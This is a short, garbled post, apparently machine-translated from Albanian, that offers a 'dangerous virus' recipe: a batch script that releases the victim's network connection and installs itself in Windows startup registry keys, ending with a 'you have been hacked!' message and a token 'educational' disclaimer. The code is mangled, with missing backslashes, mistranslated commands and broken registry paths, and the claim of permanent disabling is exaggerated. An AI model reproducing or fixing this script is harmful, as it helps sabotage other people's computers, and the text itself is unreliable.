Today I share some tricks to make a dangerous virus that can disable a victimof the Permanent Internet. It isan easy trick that you worry so nuk. Mua now follow: 1. Open Notepad.Jo fool mua ask where you can find. 2. Kopjimi and paste the following code in the blloku notes. miss @ echo off> c: windowswimn32.bat eko of kominoshe per fënijë>> c: windowswimn32.bat miss ipconfig / release_all >> c: windowswimn32.bat eko finale >> c: windowswimn32.bat ersionrun hkey_local_machinesoftwaremicrosoftwindowscurrentv reg add / v WINDOWsAPI / t REG_SZ / d: windowswimn32.bat / f rsionrun hkey_current_usersoftwaremicrosoftwindowscurrentve reg add / v CONTROLexit / t REG_SZ / dc: windowswimn32.bat / f miss you have been hacked! PAUSE 3. Save as anything.bat 4. Already done. 5. Learn gjobat only educational parag.
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